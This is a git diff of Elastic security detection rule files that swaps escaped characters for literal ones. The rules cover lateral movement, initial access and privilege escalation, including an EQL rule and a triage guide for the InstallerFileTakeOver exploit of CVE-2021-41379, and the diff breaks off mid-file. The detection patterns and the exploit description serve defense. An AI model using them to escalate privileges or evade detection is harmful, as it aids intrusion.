+++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json
index 781a6c2ffeb..e97569788f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_100.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json
index 84ffd037dfe..58f5db6045b 100644
--- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_101.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json
index b55963e47b5..56c4e9cb6cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/58ac2aa5-6718-427c-a845-5f3ac5af00ba_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json
index 344f9b6b0a7..581b3fa2054 100644
--- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_104.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json
index 1a276c22a70..d1074628c6e 100644
--- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_105.json
@@ -89,7 +89,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json
index 062ceaffb44..ba78c739da6 100644
--- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_106.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json
index 8e5f92d0aed..dd19be632b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_107.json
@@ -89,7 +89,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json
index 6caf8f14228..19514686bac 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_104.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. 
Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
$osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json
index 70a7f815853..d5e263de636 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_105.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json
index 9ad723fe833..c2169bc8782 100644
--- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_106.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Privilege Escalation via InstallerFileTakeOver",
- "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
